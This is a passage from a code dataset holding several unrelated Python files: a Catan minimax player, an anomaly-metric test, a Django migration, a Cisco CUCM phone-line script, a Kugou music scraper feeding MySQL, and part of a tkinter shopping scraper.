params[\"army_size\"]\n )\n\n return fn\n\n\ndef value_production(sample, player_name=\"P0\", include_variety=True):\n proba_point = 2.778 / 100\n features = [\n f\"EFFECTIVE_{player_name}_WHEAT_PRODUCTION\",\n f\"EFFECTIVE_{player_name}_ORE_PRODUCTION\",\n f\"EFFECTIVE_{player_name}_SHEEP_PRODUCTION\",\n f\"EFFECTIVE_{player_name}_WOOD_PRODUCTION\",\n f\"EFFECTIVE_{player_name}_BRICK_PRODUCTION\",\n ]\n prod_sum = sum([sample[f] for f in features])\n prod_variety = (\n sum([sample[f] != 0 for f in features]) * TRANSLATE_VARIETY * proba_point\n )\n return prod_sum + (0 if not include_variety else prod_variety)\n\n\ndef contender_fn(params):\n return base_fn(params or CONTENDER_WEIGHTS)\n\n\nALPHABETA_DEFAULT_DEPTH = 2\nMAX_SEARCH_TIME_SECS = 20\n\n\nclass AlphaBetaPlayer(Player):\n \"\"\"\n Player that executes an AlphaBeta Search where the value of each node\n is taken to be the expected value (using the probability of rolls, etc...)\n of its children. 
At leafs we simply use the heuristic function given.\n\n NOTE: More than 3 levels seems to take much longer, it would be\n interesting to see this with prunning.\n \"\"\"\n\n def __init__(\n self,\n color,\n depth=ALPHABETA_DEFAULT_DEPTH,\n prunning=True,\n value_fn_builder_name=None,\n params=DEFAULT_WEIGHTS,\n epsilon=None,\n ):\n super().__init__(color)\n self.depth = int(depth)\n self.prunning = str(prunning).lower() != \"false\"\n self.value_fn_builder_name = (\n \"contender_fn\" if value_fn_builder_name == \"C\" else \"base_fn\"\n )\n self.params = params\n self.use_value_function = None\n self.epsilon = epsilon\n\n def value_function(self, game, p0_color):\n raise NotImplementedError\n\n def get_actions(self, game):\n if self.prunning:\n return list_prunned_actions(game)\n return game.state.playable_actions\n\n def decide(self, game: Game, playable_actions):\n actions = self.get_actions(game)\n if len(actions) == 1:\n return actions[0]\n\n if self.epsilon is not None and random.random() < self.epsilon:\n return random.choice(playable_actions)\n\n start = time.time()\n state_id = str(len(game.state.actions))\n node = DebugStateNode(state_id, self.color) # i think it comes from outside\n deadline = start + MAX_SEARCH_TIME_SECS\n result = self.alphabeta(\n game.copy(), self.depth, float(\"-inf\"), float(\"inf\"), deadline, node\n )\n # print(\"Decision Results:\", self.depth, len(actions), time.time() - start)\n # if game.state.num_turns > 10:\n # render_debug_tree(node)\n # breakpoint()\n return result[0]\n\n def __repr__(self) -> str:\n return (\n super().__repr__()\n + f\"(depth={self.depth},value_fn={self.value_fn_builder_name},prunning={self.prunning})\"\n )\n\n def alphabeta(self, game, depth, alpha, beta, deadline, node):\n \"\"\"AlphaBeta MiniMax Algorithm.\n\n NOTE: Sometimes returns a value, sometimes an (action, value). 
This is\n because some levels are state=>action, some are action=>state and in\n action=>state would probably need (action, proba, value) as return type.\n\n {'value', 'action'|None if leaf, 'node' }\n \"\"\"\n if depth == 0 or game.winning_color() is not None or time.time() >= deadline:\n value_fn = get_value_fn(\n self.value_fn_builder_name,\n self.params,\n self.value_function if self.use_value_function else None,\n )\n value = value_fn(game, self.color)\n\n node.expected_value = value\n return None, value\n\n maximizingPlayer = game.state.current_color() == self.color\n actions = self.get_actions(game) # list of actions.\n action_outcomes = expand_spectrum(game, actions) # action => (game, proba)[]\n\n if maximizingPlayer:\n #print(\"JEAH\")\n\n best_action = None\n best_value = float(\"-inf\")\n for i, (action, outcomes) in enumerate(action_outcomes.items()):\n action_node = DebugActionNode(action)\n\n expected_value = 0\n for j, (outcome, proba) in enumerate(outcomes):\n out_node = DebugStateNode(\n f\"{node.label} {i} {j}\", outcome.state.current_color()\n )\n\n result = self.alphabeta(\n outcome, depth - 1, alpha, beta, deadline, out_node\n )\n value = result[1]\n expected_value += proba * value\n\n action_node.children.append(out_node)\n action_node.probas.append(proba)\n\n action_node.expected_value = expected_value\n node.children.append(action_node)\n\n if expected_value > best_value:\n best_action = action\n best_value = expected_value\n alpha = max(alpha, best_value)\n if alpha >= beta:\n break # beta cutoff\n\n node.expected_value = best_value\n return best_action, best_value\n else:\n #print(\"NOT\")\n best_action = None\n best_value = float(\"inf\")\n for i, (action, outcomes) in enumerate(action_outcomes.items()):\n action_node = DebugActionNode(action)\n\n expected_value = 0\n for j, (outcome, proba) in enumerate(outcomes):\n out_node = DebugStateNode(\n f\"{node.label} {i} {j}\", outcome.state.current_color()\n )\n\n result = self.alphabeta(\n outcome, depth - 1, alpha, beta, deadline, out_node\n )\n value = result[1]\n expected_value += proba * value\n\n action_node.children.append(out_node)\n action_node.probas.append(proba)\n\n action_node.expected_value = expected_value\n node.children.append(action_node)\n\n if expected_value < best_value:\n best_action = action\n best_value = expected_value\n beta = min(beta, best_value)\n if beta <= alpha:\n break # alpha cutoff\n\n node.expected_value = best_value\n return best_action, best_value\n\n\nclass DebugStateNode:\n def __init__(self, label, color):\n self.label = label\n self.children = [] # DebugActionNode[]\n self.expected_value = None\n self.color = color\n\n\nclass DebugActionNode:\n def __init__(self, action):\n self.action = action\n self.expected_value: Any = None\n self.children = [] # DebugStateNode[]\n self.probas = []\n\n\ndef render_debug_tree(node):\n from graphviz import Digraph\n\n dot = Digraph(\"AlphaBetaSearch\")\n\n agenda = [node]\n\n while len(agenda) != 0:\n tmp = agenda.pop()\n dot.node(\n tmp.label,\n label=f\"<{tmp.label}{tmp.expected_value} >\",\n style=\"filled\",\n fillcolor=tmp.color.value,\n )\n for child in tmp.children:\n action_label = (\n f\"{tmp.label} - {str(child.action).replace('<', '').replace('>', '')}\"\n )\n dot.node(\n action_label,\n label=f\"<{action_label}{child.expected_value} >\",\n shape=\"box\",\n )\n dot.edge(tmp.label, action_label)\n for action_child, proba in zip(child.children, child.probas):\n dot.node(\n action_child.label,\n 
label=f\"<{action_child.label}{action_child.expected_value} >\",\n )\n dot.edge(action_label, action_child.label, label=str(proba))\n agenda.append(action_child)\n print(dot.render())\n\n\ndef list_prunned_actions(game):\n current_color = game.state.current_color()\n playable_actions = game.state.playable_actions\n actions = playable_actions.copy()\n types = set(map(lambda a: a.action_type, playable_actions))\n\n # Prune Initial Settlements at 1-tile places\n if ActionType.BUILD_SETTLEMENT in types and game.state.is_initial_build_phase:\n actions = filter(\n lambda a: len(game.state.board.map.adjacent_tiles[a.value]) != 1, actions\n )\n\n # Prune Trading if can hold for resources. Only for rare resources.\n if ActionType.MARITIME_TRADE in types:\n port_resources = game.state.board.get_player_port_resources(current_color)\n has_three_to_one = None in port_resources\n # TODO: for 2:1 ports, skip any 3:1 or 4:1 trades\n # TODO: if can_safely_hold, prune all\n tmp_actions = []\n for action in actions:\n if action.action_type != ActionType.MARITIME_TRADE:\n tmp_actions.append(action)\n continue\n # has 3:1, skip any 4:1 trades\n if has_three_to_one and action.value[3] is not None:\n continue\n tmp_actions.append(action)\n actions = tmp_actions\n\n if ActionType.MOVE_ROBBER in types:\n actions = prune_robber_actions(current_color, game, actions)\n\n return list(actions)\n\n\ndef prune_robber_actions(current_color, game, actions):\n \"\"\"Eliminate all but the most impactful tile\"\"\"\n enemy_color = next(filter(lambda c: c != current_color, game.state.colors))\n enemy_owned_tiles = set()\n for node_id in get_player_buildings(\n game.state, enemy_color, BuildingType.SETTLEMENT\n ):\n enemy_owned_tiles.update(game.state.board.map.adjacent_tiles[node_id])\n for node_id in get_player_buildings(game.state, enemy_color, BuildingType.CITY):\n enemy_owned_tiles.update(game.state.board.map.adjacent_tiles[node_id])\n\n robber_moves = set(\n filter(\n lambda a: a.action_type == ActionType.MOVE_ROBBER\n and game.state.board.map.tiles[a.value[0]] in enemy_owned_tiles,\n actions,\n )\n )\n\n production_features = build_production_features(True)\n\n def impact(action):\n game_copy = game.copy()\n game_copy.execute(action)\n\n our_production_sample = production_features(game_copy, current_color)\n enemy_production_sample = production_features(game_copy, current_color)\n production = value_production(our_production_sample, \"P0\")\n enemy_production = value_production(enemy_production_sample, \"P1\")\n\n return enemy_production - production\n\n most_impactful_robber_action = max(\n robber_moves, key=impact\n ) # most production and variety producing\n actions = filter(\n # lambda a: a.action_type != action_type or a == most_impactful_robber_action,\n lambda a: a.action_type != ActionType.MOVE_ROBBER or a in robber_moves,\n actions,\n )\n return actions\n", "repo_name": "nomah98/catan-project", "sub_path": "catanatron_experimental/catanatron_experimental/machine_learning/players/minimax.py", "file_name": "minimax.py", "file_ext": "py", "file_size_in_byte": 17833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "catanatron.models.player.Player", "line_number": 65, "usage_type": "name"}, {"api_name": "random.random", "line_number": 86, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 87, "usage_type": "call"}, {"api_name": "catanatron_gym.features.build_production_features", "line_number": 120, "usage_type": 
"call"}, {"api_name": "catanatron.state_functions.player_key", "line_number": 126, "usage_type": "call"}, {"api_name": "catanatron.state_functions.get_longest_road_length", "line_number": 127, "usage_type": "call"}, {"api_name": "catanatron_gym.features.reachability_features", "line_number": 129, "usage_type": "call"}, {"api_name": "catanatron.models.enums.RESOURCES", "line_number": 130, "usage_type": "name"}, {"api_name": "catanatron.models.enums.RESOURCES", "line_number": 132, "usage_type": "name"}, {"api_name": "catanatron_gym.features.resource_hand_features", "line_number": 135, "usage_type": "call"}, {"api_name": "catanatron.models.enums.RESOURCES", "line_number": 136, "usage_type": "name"}, {"api_name": "catanatron.state_functions.player_num_resource_cards", "line_number": 149, "usage_type": "call"}, {"api_name": "catanatron.models.enums.BuildingType.SETTLEMENT", "line_number": 154, "usage_type": "attribute"}, {"api_name": "catanatron.models.enums.BuildingType", "line_number": 154, "usage_type": "name"}, {"api_name": "catanatron.models.enums.BuildingType.CITY", "line_number": 154, "usage_type": "attribute"}, {"api_name": "catanatron.state_functions.player_num_dev_cards", "line_number": 178, "usage_type": "call"}, {"api_name": "catanatron.state_functions.get_played_dev_cards", "line_number": 179, "usage_type": "call"}, {"api_name": "catanatron.models.player.Player", "line_number": 209, "usage_type": "name"}, {"api_name": "catanatron.game.Game", "line_number": 246, "usage_type": "name"}, {"api_name": "random.random", "line_number": 251, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 252, "usage_type": "call"}, {"api_name": "time.time", "line_number": 254, "usage_type": "call"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "catanatron_experimental.machine_learning.players.tree_search_utils.expand_spectrum", "line_number": 295, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 379, "usage_type": "name"}, {"api_name": "graphviz.Digraph", "line_number": 387, "usage_type": "call"}, {"api_name": "catanatron.models.actions.ActionType.BUILD_SETTLEMENT", "line_number": 426, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 426, "usage_type": "name"}, {"api_name": "catanatron.models.actions.ActionType.MARITIME_TRADE", "line_number": 432, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 432, "usage_type": "name"}, {"api_name": "catanatron.models.actions.ActionType.MARITIME_TRADE", "line_number": 439, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 439, "usage_type": "name"}, {"api_name": "catanatron.models.actions.ActionType.MOVE_ROBBER", "line_number": 448, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 448, "usage_type": "name"}, {"api_name": "catanatron.state_functions.get_player_buildings", "line_number": 458, "usage_type": "call"}, {"api_name": "catanatron.models.enums.BuildingType.SETTLEMENT", "line_number": 459, "usage_type": "attribute"}, {"api_name": "catanatron.models.enums.BuildingType", "line_number": 459, "usage_type": "name"}, {"api_name": "catanatron.state_functions.get_player_buildings", "line_number": 462, "usage_type": "call"}, {"api_name": "catanatron.models.enums.BuildingType.CITY", "line_number": 462, "usage_type": "attribute"}, {"api_name": "catanatron.models.enums.BuildingType", "line_number": 462, "usage_type": 
"name"}, {"api_name": "catanatron.models.actions.ActionType.MOVE_ROBBER", "line_number": 467, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 467, "usage_type": "name"}, {"api_name": "catanatron_gym.features.build_production_features", "line_number": 473, "usage_type": "call"}, {"api_name": "catanatron.models.actions.ActionType.MOVE_ROBBER", "line_number": 491, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 491, "usage_type": "name"}]}
+{"seq_id": "9985162922", "text": "import os\nimport argparse\nimport numpy as np\nfrom PIL import Image\n\nfrom measures import get_measures\n\ntrain_id_in = 0\ntrain_id_out = 1\nignore_id = 255\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--pred_npy\", type=str)\n parser.add_argument(\"--gt_anno\", type=str)\n opt = parser.parse_args()\n \n # Load pred npy\n assert os.path.exists(opt.pred_npy)\n pred = np.load(opt.pred_npy)\n \n # Load gt anno\n assert os.path.exists(opt.gt_anno)\n gt = np.asarray(Image.open(opt.gt_anno))\n \n height, width = gt.shape\n \n if pred.ndim == 3:\n assert pred.shape[0] == 1\n pred = pred[0]\n assert pred.shape == gt.shape\n \n converted_gt = np.zeros_like(gt)\n converted_gt += train_id_in\n converted_gt[gt == 254] = train_id_out\n converted_gt[gt == ignore_id] = ignore_id # ignored label\n \n import IPython; IPython.embed()\n \n auroc, aupr, fpr = get_measures(pred[converted_gt == train_id_out], pred[converted_gt == train_id_in])\n\n print(auroc, aupr, fpr)\n", "repo_name": "AIR-DISCOVER/video-anomaly-benchmarking", "sub_path": "metric/utils/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 24, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 24, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 33, "usage_type": "call"}, {"api_name": "IPython.embed", "line_number": 38, "usage_type": "call"}, {"api_name": "measures.get_measures", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "9162991364", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('entrances', '0039_auto_20170521_1512'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='entrance',\n name='logged_in',\n field=models.BooleanField(default=False, verbose_name='logged_in'),\n preserve_default=True,\n ),\n ]\n", "repo_name": "Happyandhappy/django_email", "sub_path": "entrances/migrations/0040_entrance_logged_in.py", "file_name": "0040_entrance_logged_in.py", "file_ext": "py", "file_size_in_byte": 471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "7809646943", "text": "import requests\nfrom zeep import Client\nfrom zeep.transports import Transport\nfrom requests.auth import HTTPBasicAuth\nimport sys\n\n\n###############DATI DA COMPLETARE\nUSER = \"user\"\nPASSWORD = \"password\"\nIP = \"10.20.30.40\"\nVERSION = \"11.5\"\n#fkuniversalLineTemplate = \"d78e1398-a65c-b1f6-48d1-913c8a8901f5\"\n#################################\n\n\n\nsession = requests.Session()\nsession.verify = False\nsession.auth = HTTPBasicAuth(user, password)\ntransport = Transport(session=session)\nclient = Client('file:///mnt/c/Users/Operatore/Downloads/axlsqltoolkit/schema/'+version+'/AXLAPI.wsdl',transport=transport)\n\nservice = client.create_service(\"{http://www.cisco.com/AXLAPIService/}AXLAPIBinding\",\"https://\"+ip+\"/axl/\")\n\n\nlistUser = service.listUser(searchCriteria={\"userid\":\"federico.tabbo\"},returnedTags=())[\"return\"][\"user\"]\n\nfor endUser in listUser:\n\tcurUser = service.getUser(uuid=endUser[\"uuid\"])[\"return\"][\"user\"]\n\tprint(curUser)\n\tpriExtensionPattern = curUser[\"primaryExtension\"][\"pattern\"]\n\tpriExtensionRoutePartition = curUser[\"primaryExtension\"][\"routePartitionName\"]\n\tprint(priExtensionPattern)\n\tprint(\"------------\")\n\tcurDN = service.getLine(pattern=priExtensionPattern,routePartitionName=priExtensionRoutePartition)[\"return\"][\"line\"]\n\tcurDNpkid = curDN[\"uuid\"][1:-1]\n\tcurDNassociatedDevices = curDN[\"associatedDevices\"][\"device\"]\n\n\tfor phone in curDNassociatedDevices:\n\t\tcurPhone = service.getPhone(name=phone)[\"return\"][\"phone\"]\n\t\tprint(curPhone[\"name\"])\n\t\tcurPhoneLines = curPhone[\"lines\"]\n\n\t\tprint(\"---------\")\n\t\tprint(curPhoneLines[\"line\"][0])\n\t\tprint(\"----------\")\n\n\t\tfor line in curPhoneLines[\"line\"]:\n\t\t\tprint(\"FOR LOOP\")\n\t\t\tprint(\"LINE\")\n\t\t\tprint(line)\n\t\t\tprint(\"PRIEXTENSION\")\n\t\t\tprint(priExtensionPattern)\n\t\t\tif int(line[\"dirn\"][\"pattern\"]) == int(priExtensionPattern):\n\t\t\t\trightLine = curPhoneLines[\"index\"]\n\n\t\tservice.updatePhone(name=phone,lines={\"line\":{\"index\":rightLine,\"dirn\":{\"pattern\":priExtensionPattern,\"routePartitionName\":priExtensionRoutePartition},\"associatedEndusers\":{\"enduser\":{\"userId\":curUser}}}})", "repo_name": "icovada/miscellaneous-cucm-utilities", "sub_path": "devicenumplanmapendusermap.py", "file_name": "devicenumplanmapendusermap.py", "file_ext": "py", "file_size_in_byte": 2030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.Session", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 20, "usage_type": "call"}, {"api_name": "zeep.transports.Transport", "line_number": 21, "usage_type": "call"}, {"api_name": "zeep.Client", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "14791969648", "text": "import requests\n# 导入xpath模块\nfrom lxml import etree\nimport re\nfrom bs4 import BeautifulSoup\n# 连接数据库的模块\nimport pymysql\n\nmusic_info_url_list = []\nmusic_download_url_list = []\n\n# 榜单网页url\nmusic_list_url =\"https://www.kugou.com/yy/rank/home/1-8888.html?from=rank\"\n#music_list_url = \"https://www.kugou.com/yy/rank/home/1-23784.html?from=rank\"#红歌榜1\n#music_list_url = \"https://www.kugou.com/yy/rank/home/1-31308.html?from=rank\"#新歌版0\n#music_list_url = \"https://www.kugou.com/yy/rank/home/1-44412.html?from=rank\"#说唱榜2\n#music_list_url = \"https://www.kugou.com/yy/rank/home/1-33165.html?from=rank\"#粤语榜3\n# 榜单网页源代码\nmusic_list_html = requests.get(music_list_url).text\n\n# 获取歌手和歌曲名\ndef get_music_name():\n element = etree.HTML(music_list_html)\n # @title是提取li标签中title属性的内容 获取歌曲名称和歌手\n music_list_name_info = element.xpath('//div[@class=\"pc_temp_songlist \"]/ul/li/@title')\n return music_list_name_info\n\n# 将音乐名称和歌手 存储到列表中\nmusic_name_list = get_music_name()\n\n# 获取存储音乐信息的网页url 存储到列表中 返回值为列表\ndef get_music_info_url():\n soup = BeautifulSoup(music_list_html,features=\"lxml\")\n script = soup.find_all('script')[-1]\n # print(script)\n # print(type(script))\n # 查找符合正则表达式的字符串 此时script变量为bs4格式 我们需要将其转化为字符串格式\n info = re.findall(r'\\[.*\\]',str(script))[1]\n # print(info)\n # 替换符合正则表达式的字符串\n info = re.sub(r'\\[|\\]',\"\",info)\n # print(type(info))\n # 分割符合正则表达式的字符串\n info = re.split(r'\\},\\{',info)\n # print(info)\n for i in range(len(info)):\n # 获取hash属性值\n hash = re.findall(r'H.*?,',info[i])[0].split('\"')[2]\n # 获取album_id属性值\n album_id = re.findall(r'album_id.*?,',info[i])[0].split(\":\")[1].replace(\",\",\"\")\n # print(album_id)\n if len(hash) > 0 and len(album_id) > 0:\n music_info_url = \"https://wwwapi.kugou.com/yy/index.php?r=play/getdata&hash=\" + hash + \"&album_id=\" + album_id\n else:\n print(str(i) + \" \" + \"为空\")\n # 将音乐信息网页地址存储到列表中\n music_info_url_list.append(music_info_url)\n return music_info_url_list\n\n# 获取音乐下载地址\ndef get_music_download_url():\n # 使用请求头 不然获取不到音乐信息\n headers = {\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\n \"cookie\": \"kg_mid=5177dda4cc5327932ceb0652b3abbdf4; kg_dfid=2AveiS1FiBds3dWdin1RsaQ6; kg_dfid_collect=d41d8cd98f00b204e9800998ecf8427e; Hm_lvt_aedee6983d4cfc62f509129360d6bb3d=1611227172; Hm_lpvt_aedee6983d4cfc62f509129360d6bb3d=1611237914\"}\n # 循环得到的存储音乐信息的网页url\n\n for music_info_url in music_info_url_list:\n\n music_info_html = requests.get(music_info_url,headers=headers).text\n # print(music_info_url)\n # print(music_info_html)\n # 获取音乐下载地址\n music_download_url = re.findall(r'play_url.*?\\.mp3',music_info_html)[0].split('\"')[-1].replace(\"\\\\\",\"\")\n # print(music_download_url)\n # 将播放地址添加到列表中\n music_download_url_list.append(music_download_url)\n return music_download_url_list\n\n\n\n# 将获取到的数据添加到数据库中\ndef put_info_to_mysql():\n # 连接数据库\n db = pymysql.connect(host=\"127.0.0.1\",port=3306, user=\"root\",password=\"123456\",database=\"music\",charset=\"utf8\")\n # 创建指针\n cursor = db.cursor()\n for i in range(len(music_download_url_list)):\n # print(music_name_list)\n # 歌曲名称\n name = music_name_list[i].split(\" - \")[1]\n # 歌手\n singer = music_name_list[i].split(\" - \")[0]\n # 播放地址\n url = music_download_url_list[i]\n print(name + \" \" + singer + \" \" + url)\n # 执行的SQL语句\n sql = \"\"\"insert into musicsystem_info(Name,Singer,Time,Url,Type) values 
('{}','{}','{}','{}','{}')\"\"\".format(name,singer,\"2020.1.22\",url,0)\n try:\n # 执行SQL语句\n cursor.execute(sql)\n # 提交\n db.commit()\n print(\"执行成功\")\n except:\n # 添加失败时回滚\n db.rollback()\n print(\"执行失败\")\n # 关闭数据库连接\n db.close()\n\n\n# 主函数\ndef main():\n get_music_info_url()\n get_music_download_url()\n put_info_to_mysql()\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Blue-wu/music", "sub_path": "kugou.py", "file_name": "kugou.py", "file_ext": "py", "file_size_in_byte": 4679, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 23, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 23, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 33, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 38, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 41, "usage_type": "call"}, {"api_name": "re.split", "line_number": 44, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 48, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 50, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 69, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 73, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 84, "usage_type": "call"}]}
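kugou.py above interpolates scraped strings directly into its INSERT via str.format, which breaks on quotes in song titles and is open to SQL injection. A parameterized variant (same hypothetical musicsystem_info schema) is the safer pattern:

import pymysql

def insert_track(db, name, singer, url):
    # %s placeholders let pymysql escape quotes and other special characters.
    with db.cursor() as cursor:
        cursor.execute(
            "insert into musicsystem_info(Name,Singer,Time,Url,Type) "
            "values (%s, %s, %s, %s, %s)",
            (name, singer, "2020.1.22", url, 0),
        )
    db.commit()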
+{"seq_id": "30616171", "text": "import tkinter as tk\nimport tkinter.ttk as ttk\nfrom ttkthemes import themed_tk\n\nimport webbrowser\nfrom functools import partial\nimport ctypes\nimport urllib.parse \t\t\t\t\t\nimport urllib\nimport re\t\t\t\t\t\t\t\t# Regular Expressions\nfrom PIL import ImageTk,Image\t\t\t# Image processing\nfrom urllib.request import urlopen\t\t# Fetching a web image\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass basicProcesses():\n\tdef progress(self,val):\n\t\tself.master.master.tabLowerProgress[\"value\"]=val\n\t\tself.master.master.tabLowerProgress.update_idletasks()\n\n\tdef optimizeSearchInput(self,searchKeys=\"\"):\n\t\tsearchKeys = searchKeys.strip().lower()\n\t\treturn urllib.parse.quote(searchKeys)\n\n\tdef openWebsite(self,link):\n\t\twebbrowser.open_new(link)\n\n\tdef getSoup(self,searchURL,progressFactor=50):\n\t\theaders = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\", \"Accept-Encoding\":\"gzip, deflate\", \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"DNT\":\"1\",\"Connection\":\"close\", \"Upgrade-Insecure-Requests\":\"1\"}\n\t\tsource = requests.get(searchURL,headers=headers).content\n\t\tself.progress(progressFactor)\n\t\tsoup = BeautifulSoup(source,'lxml')\n\t\twith open(\"munmmun.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\tfile.write(soup.prettify())\n\t\treturn soup\n\n\tdef __init__(self,master=None):\n\t\tpass\n\n\nclass initResultCardShopping(ttk.Frame,basicProcesses):\n\tdef resultCardShoppingLoadWidgets(self,scrapeShoppingData,thumbName,gridCol,success):\n\t\tself.cardShoppingFrameElements[thumbName] = {}\n\t\tif success:\n\t\t\tself.cardShoppingFrameElements[thumbName]['name'] = ttk.Label(self,text=scrapeShoppingData['name'],\t\t\t\t\t\tfont = (\"Calibri\",15,'bold'),wrap=600,style=\"linkShopping.TLabel\")\n\t\t\tself.cardShoppingFrameElements[thumbName]['finalprice'] = ttk.Label(self,text='₹ '+scrapeShoppingData['finalprice'],\tfont = (\"Calibri\",19,'bold'),wrap=700,style=\"textShopping.TLabel\")\n\t\t\tself.cardShoppingFrameElements[thumbName]['discount'] =ttk.Label(self,text=\"Discount - \"+scrapeShoppingData['discount'],font = (\"Calibri\",14),wrap=700,style=\"textShopping.TLabel\")\n\t\t\tself.cardShoppingFrameElements[thumbName]['initialprice'] = ttk.Label(self,text='₹ '+scrapeShoppingData['initialprice'],font = (\"Calibri\",11,'overstrike'),wrap=700,style=\"textShopping.TLabel\")\n\t\t\tif scrapeShoppingData['rating']=='No Rating':\n\t\t\t\tself.cardShoppingFrameElements[thumbName]['rating'] = ttk.Label(self,text=scrapeShoppingData['rating'],\t\t\t\tfont = (\"Calibri\",13),wrap=700,style=\"textShopping.TLabel\")\n\t\t\telse:\n\t\t\t\tself.cardShoppingFrameElements[thumbName]['rating'] = ttk.Label(self,text=scrapeShoppingData['rating']+' ⭐',\t\t\tfont = (\"Calibri\",14,'bold'),wrap=600,style=\"textShopping.TLabel\")\n\t\t\tif scrapeShoppingData['reviewphrase'] == 'No Review':\n\t\t\t\tself.cardShoppingFrameElements[thumbName]['reviewphrase'] = ttk.Label(self,text=scrapeShoppingData['reviewphrase'],\tfont = (\"Calibri\",13),wrap=600,style=\"textShopping.TLabel\")\n\t\t\telse:\n\t\t\t\tself.cardShoppingFrameElements[thumbName]['reviewphrase'] = ttk.Label(self,text=scrapeShoppingData['reviewphrase'],\tfont = (\"Calibri\",13,'bold'),wrap=650,style=\"textShopping.TLabel\")\n\t\t\tself.cardShoppingFrameElements[thumbName]['review'] = ttk.Label(self,text=scrapeShoppingData['review'],\t\t\t\t\tfont = 
(\"Calibri\",13),wrap=650,style=\"textShopping.TLabel\")\n\t\telse:\n\t\t\tself.cardShoppingFrameElements[thumbName]['name'] = ttk.Label(self,text=scrapeShoppingData['name'],\t\t\t\t\tfont = (\"Calibri\",17,'bold'),wrap=600,style=\"linkShopping.TLabel\")\t\n\n\t\tself.cardShoppingFrameElements[thumbName]['frameCaptionImage'] = ImageTk.PhotoImage(Image.open(f\"images/{thumbName}-caption.png\"))\n\t\tself.cardShoppingFrameElements[thumbName]['frameCaption'] = ttk.Label(self,image=self.cardShoppingFrameElements[thumbName]['frameCaptionImage'],style=\"textShopping.TLabel\")\n\n\t\tself.cardShoppingFrameElements[thumbName]['searchurl'] = scrapeShoppingData['searchurl']\n\t\tself.cardShoppingFrameElements[thumbName]['name'].bind(\"\", lambda event : event.widget.config(style=\"linkShoppingActive.TLabel\"))\n\t\tself.cardShoppingFrameElements[thumbName]['name'].bind(\"\", lambda event : event.widget.config(style=\"linkShopping.TLabel\"))\n\t\tself.cardShoppingFrameElements[thumbName]['name'].bind(\"\", lambda event : 